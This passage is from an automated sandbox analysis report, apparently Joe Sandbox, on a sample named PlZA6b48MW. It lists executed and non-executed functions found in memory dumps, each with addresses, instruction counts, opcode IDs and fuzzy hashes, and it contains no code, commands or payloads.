                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e359e9501ac0e42088b1507103a6ba86948385f55e321f7110ef6524a2d424b
                                                                            • Instruction ID: 45f663547027c39174151f2acd9237fbffc2b0c70a0ae0a7d20ce07ac504df44
                                                                            • Opcode Fuzzy Hash: 0e359e9501ac0e42088b1507103a6ba86948385f55e321f7110ef6524a2d424b
                                                                            • Instruction Fuzzy Hash: 7D01F434A08E19CFCB65DF54C495AA973B1FB5C304F5105A9D00ED7260CA34AA45CB81
                                                                            Function 00007FFD9B883696 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: fbd84bb240e6ae2ac9753cf1f42eaf4c11986d7e39ea946345689bbb6a2b7331
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: EA013630E5DD1E8BEB74EB58CC606F873A1EF58311F1601B9D45ED32A2CD786AC18A00
                                                                            Function 00007FFD9B8863FD Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction ID: fa08f5221e5ed7645081954279ca229d6dcb7f20cbbb5916d11753e108791eb3
                                                                            • Opcode Fuzzy Hash: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction Fuzzy Hash: B3E0ED21A0A91A87FBA4A384CC60BB96265EF58300F1601B8D95E933D1CD38AF40C645
                                                                            Function 00007FFD9B880B95 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction ID: 574516e6861bcbd8945eb7022d076ee537c62d37ccb9b8b8cff6e0c7a3cdfdc4
                                                                            • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction Fuzzy Hash: DED0A73061995E4FE601F778D8499547BD0FB1F211BD914E1D008C7561D51489558B00
                                                                            Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
                                                                            • Instruction ID: 2677fc7bfd2683c693b646420594209abae2644c2d195145f1bceb9e5f756f74
                                                                            • Opcode Fuzzy Hash: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
                                                                            • Instruction Fuzzy Hash: A8C00205F6BE1E02E825B7AA98660ACA1446FDDA10FEB0172D569501A1A86E22960196
                                                                            Function 00007FFD9B880B18 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction ID: 15bb9bc3bc112feedbc9b838f7070e83bd3d138886bce8923a2e83841389257d
                                                                            • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction Fuzzy Hash: 6AC08C305118188FCA00EB2CC88480032E0FB0E210BC200D0E40DC7170E22ADC80C740
                                                                            Function 00007FFD9B881280 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 6a00049e8ca182c2eb4530ae5ea2728430e17252d36e448b6e55ee6a9536c2e8
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: 1FC08C30551C0C8FC908FB68C89481433A0FB0D300BC20090E008C71B0D229DCD1C740
                                                                            Function 00007FFD9B881E15 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 616019b8a1295cc3fe4163b689778a58b272f61794b4b14fcdafff581e3d408e
                                                                            • Instruction ID: 224f1770749ee75e7f5575aa158ac5520587d18a18dcccc01f3deeca73d7585a
                                                                            • Opcode Fuzzy Hash: 616019b8a1295cc3fe4163b689778a58b272f61794b4b14fcdafff581e3d408e
                                                                            • Instruction Fuzzy Hash: BAC04C01F1DC5A47F359A614C5715BE45539B98798FD50474E06DC72CECD2D5E030287
                                                                            Function 00007FFD9B880540 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: 444b06883d6403d80a20305b353aa5c2b492d5e88afe7384271677b11c4a0f03
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: AEB09220D6BA0F43DA3833B10892864B050AB4D204FD202B4D419401A1A97F52958282
                                                                            Function 00007FFD9B8837E4 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: 105df88bc064afe158920e2b52b50a2a3bd25cc092415d7a1fa889fc1ff5f02b
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: C6B02200EAA80C03E330ABB088202BE32000F0C208F0B80BA802AA3083CE382A020A00
                                                                            Function 00007FFD9B880520 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 7c69805296b747c8bb6619effc5133634486393f796e516f843f39d7a1b03565
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 8FB01204D7BC0E02E42433F50B5A06470405B4D510FD21470D41940095985F1AA40182
                                                                            Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: bb31b72b98842f8e3b33be80a82a97bc21048ba867448af131269b9e260de9e6
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: 98B01200D67C0F02E42433FB0C52064B0446F8C200FCB0170D42D501A1A85E12950282

                                                                            Non-executed Functions

                                                                            Function 00007FFD9BC7B6C8 Relevance: .5, Instructions: 527COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1824088603.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28522582463cc7ca269099d51b000e023fb936a985466fb7ec7312032a5630fd
                                                                            • Instruction ID: b7e2edef754d8b397d5f230eee671fe21c776212fb2a8d9759e233ebd34b4261
                                                                            • Opcode Fuzzy Hash: 28522582463cc7ca269099d51b000e023fb936a985466fb7ec7312032a5630fd
                                                                            • Instruction Fuzzy Hash: 90028330B1995E4FEBA8EBB884BA67D73D2FF98300F550579E40DC32E6DD28A9418741
                                                                            Function 00007FFD9B880E43 Relevance: .2, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1eb5338b082c4df1195ba0eddbeecda564e692f49004c5c96ee559dcb672a0d
                                                                            • Instruction ID: 6c1188a0d6d31d2eb6bf0789d04320270fefcd2c4d7a560354a94dc1dbfe0293
                                                                            • Opcode Fuzzy Hash: c1eb5338b082c4df1195ba0eddbeecda564e692f49004c5c96ee559dcb672a0d
                                                                            • Instruction Fuzzy Hash: 5D51DF76A19D8D8FE39CDB6898687A97FD0FB89314F4001BED059D77D5CBB824128700

                                                                            Executed Functions

                                                                            Function 00007FFD9B890D4C Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5Z_H
                                                                            • API String ID: 0-3267294416
                                                                            • Opcode ID: 9b73bec5905892086e46bff3a8dd502e41d0a2e010dc47771412af06505d8b11
                                                                            • Instruction ID: d5c36ca14249b3d118a0e11709833e8b47189f8b2899313e4815ac656d32f593
                                                                            • Opcode Fuzzy Hash: 9b73bec5905892086e46bff3a8dd502e41d0a2e010dc47771412af06505d8b11
                                                                            • Instruction Fuzzy Hash: AC910671A19A8D8FEB59DB6888757A97FE1FF59710F4001BAE049C73E6DB782401C701
                                                                            Function 00007FFD9BC82188 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 95591720038ad583092c13e917f3caa2f1efaf046cfac52c459fd674213c4cf0
                                                                            • Instruction ID: d94afa1c65bb93f56e179f9dca7a8e7eeac339153c7fa033f67236fb8f582a70
                                                                            • Opcode Fuzzy Hash: 95591720038ad583092c13e917f3caa2f1efaf046cfac52c459fd674213c4cf0
                                                                            • Instruction Fuzzy Hash: B7517071E0994E8FDB59DBE8C4695BCB7B1FF48300F2140BAD05AEB2D6DA342A01CB50
                                                                            Function 00007FFD9BC87198 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 03dff763b81fd247ff4419e992cbec0c9940166940ab55d4b5e37f9c448b2b0f
                                                                            • Instruction ID: c8162cb6c0a5e4b9faddb53f1e98df6d53fb160b45881ddf60f8e53bed1499d2
                                                                            • Opcode Fuzzy Hash: 03dff763b81fd247ff4419e992cbec0c9940166940ab55d4b5e37f9c448b2b0f
                                                                            • Instruction Fuzzy Hash: DD413B70E0954E9FDB59CFE4C4A59FDB7B1FF48300F1140AED01AAB2A6DA356A02CB50
                                                                            Function 00007FFD9BC83441 Relevance: .4, Instructions: 417COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8dd32d91a0a7b00bcdfe02cfb76f7b83041de0a7644439048c4f8836680411c
                                                                            • Instruction ID: 3e8bd6a4f97a0182c0bdb061c83333275bf1d3d010d8f6737a7dd4815c1a1411
                                                                            • Opcode Fuzzy Hash: b8dd32d91a0a7b00bcdfe02cfb76f7b83041de0a7644439048c4f8836680411c
                                                                            • Instruction Fuzzy Hash: B5D1F230B0EE4A8FD378DB68D4A457977E1FF84310B21157EE48EC76A2DA39B9428741
                                                                            Function 00007FFD9BC81CB2 Relevance: .3, Instructions: 311COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b325f627befed72ddad448318208bab40074a4640fe2f2087fc81dd8f5fc1894
                                                                            • Instruction ID: bb531cf23b3dc006cd358dd3db2f216143ab82ba242467ad3dfb5ed79de46f4d
                                                                            • Opcode Fuzzy Hash: b325f627befed72ddad448318208bab40074a4640fe2f2087fc81dd8f5fc1894
                                                                            • Instruction Fuzzy Hash: 33B1C670709E4A8FE359DB68C0A06B8B7E1FF59310F5541B9D44EC7A96CB38B951C780
                                                                            Function 00007FFD9BC86CC2 Relevance: .3, Instructions: 310COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac41904fab008027cc290db07121081b9fa0fbdbf072c09a0ea4de6f3f0dbfab
                                                                            • Instruction ID: 2bcbe9a27c9515555d543e55886cabef900b34d2c12b030a7df895646115c213
                                                                            • Opcode Fuzzy Hash: ac41904fab008027cc290db07121081b9fa0fbdbf072c09a0ea4de6f3f0dbfab
                                                                            • Instruction Fuzzy Hash: F3B1B270719E4A9FE759DB68C0A06A8B7A1FF54300F5541BAE04EC7A96CB38F951CB80
                                                                            Function 00007FFD9BC811E6 Relevance: .3, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19c79c9149ccf2c81a72cfef6dcaf86cd636ad578a3e9c5905fe8181b026bc5c
                                                                            • Instruction ID: 7e16381798784b2e06fd151f1b9799ec4d91f27ff5ee8bf7df65998ce2edb740
                                                                            • Opcode Fuzzy Hash: 19c79c9149ccf2c81a72cfef6dcaf86cd636ad578a3e9c5905fe8181b026bc5c
                                                                            • Instruction Fuzzy Hash: 16815A31B0EE4A4FE3789A78946147D77E0EF89361B16047EE48FC71A2DE38B9428741
                                                                            Function 00007FFD9BC8434D Relevance: .2, Instructions: 227COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e001b48bbc632bef22b4362b9900ff894a3d09577485ab17b8c125abd5efab0f
                                                                            • Instruction ID: c5da67cccf009dd08564df8bd4433eb2885e793f9466de980dbe4d22ce68058a
                                                                            • Opcode Fuzzy Hash: e001b48bbc632bef22b4362b9900ff894a3d09577485ab17b8c125abd5efab0f
                                                                            • Instruction Fuzzy Hash: 1761043160ED4D5FE778DAA898769BC77C0FF9432170602BDD09EC75B2DA38AA068741
                                                                            Function 00007FFD9BC88451 Relevance: .2, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1bd9d680cec839d3d1ffd4d915ff12c566eab87131e5b13c80e643538a0ebb0e
                                                                            • Instruction ID: e56854f0da7e0a67743c3cabaffd6d14a076bbb198d504ebf8fd152a2bd3d252
                                                                            • Opcode Fuzzy Hash: 1bd9d680cec839d3d1ffd4d915ff12c566eab87131e5b13c80e643538a0ebb0e
                                                                            • Instruction Fuzzy Hash: DF61E23060AF0A8FE3A4DB64C1A45B977E1FF44310B51457EC48AC7EA2DB39B982CB40
                                                                            Function 00007FFD9BC84EFB Relevance: .2, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c199b7171cf8183cb505a045ba5f363d5b49d35e01c3c07f8bf3794a3b0d5c50
                                                                            • Instruction ID: c957cf700e7c42a09df8c844704cee88ab91e839468e05daf91aafa7c2f2a39f
                                                                            • Opcode Fuzzy Hash: c199b7171cf8183cb505a045ba5f363d5b49d35e01c3c07f8bf3794a3b0d5c50
                                                                            • Instruction Fuzzy Hash: 1351AF30E1A94E9EEB65DBB488649BCBBB0FF55304F5505BED00AD71E6DA386A41C700
                                                                            Function 00007FFD9BC8761F Relevance: .2, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e64b71b54876b102b104c4bed0c5eab22acf18a22d0e18ee0e6cb8c451984e91
                                                                            • Instruction ID: 5415e811e77938c8ec5d96655d2a28b7ca157c5351072b0b10c7ec827507f28e
                                                                            • Opcode Fuzzy Hash: e64b71b54876b102b104c4bed0c5eab22acf18a22d0e18ee0e6cb8c451984e91
                                                                            • Instruction Fuzzy Hash: 1051E830519A458FE789CF18C0E05B43BA5FF45310B9551FEC84ACB69BD779E882CB40
                                                                            Function 00007FFD9BC8260F Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb2c46298d421158db78db0ce95a4fca3a1039232ea6e3ca121214c82a4a1712
                                                                            • Instruction ID: 96bfd92c9707cfd86e87882f4c3b2369e32df74d9a530c3058686b510dfe2a8f
                                                                            • Opcode Fuzzy Hash: eb2c46298d421158db78db0ce95a4fca3a1039232ea6e3ca121214c82a4a1712
                                                                            • Instruction Fuzzy Hash: AB51D43051AA458FE789CF68C0E45B43BA4FF45310B9452FDC84ACF69BD678E882CB41
                                                                            Function 00007FFD9BC86244 Relevance: .1, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c5b1bdf81d11a2c6492e3d2e28dabf50feb8095ac5828301dbe75a59f003974
                                                                            • Instruction ID: 8a87d36edc4ff4ad873e757a521df5c33e850d88d3fdb2f0cacae05a48339b2e
                                                                            • Opcode Fuzzy Hash: 4c5b1bdf81d11a2c6492e3d2e28dabf50feb8095ac5828301dbe75a59f003974
                                                                            • Instruction Fuzzy Hash: 0541F931B0EB0A4FE3798EA8A46147D77E0EF81320B11057EE48E876A2C939B6428641
                                                                            Function 00007FFD9BC89BE9 Relevance: .1, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23a434c3fee92c6117988fb68ab45847551713fe24d1a97c6f52041b1193ca71
                                                                            • Instruction ID: 09c6ece300ae1afb7435da11083d90dc0d04c5349a420574369827bf8798cbd7
                                                                            • Opcode Fuzzy Hash: 23a434c3fee92c6117988fb68ab45847551713fe24d1a97c6f52041b1193ca71
                                                                            • Instruction Fuzzy Hash: E9418661B09D5D5FE7A8F7A884BABB862D2EBA8310F550175E00DC72E3DD2C6D418741
                                                                            Function 00007FFD9B8908E8 Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76019caff4360dadee5389cf79b88d2f165d553b4d48208f8bb8a3d2d11e26fe
                                                                            • Instruction ID: 9f6045e1a3b392e092ce209780a75e93ed472c3a2d0737adf2dc4f4ae0c7d99a
                                                                            • Opcode Fuzzy Hash: 76019caff4360dadee5389cf79b88d2f165d553b4d48208f8bb8a3d2d11e26fe
                                                                            • Instruction Fuzzy Hash: 9A31273130D9194FDB68EB5CF88A9B97BD1EF8932131501BBE48AC7176ED11AC828781
                                                                            Function 00007FFD9BC89A4C Relevance: .1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 79b32b8e2f1d9fcc96db80027a29a792018b8ef24b1ad503d6514c904e302ed4
                                                                            • Instruction ID: c2bba9d8d8f0caddf73da6db71bd8a6b2e20dc0989ee2d34589731c7bb369dc2
                                                                            • Opcode Fuzzy Hash: 79b32b8e2f1d9fcc96db80027a29a792018b8ef24b1ad503d6514c904e302ed4
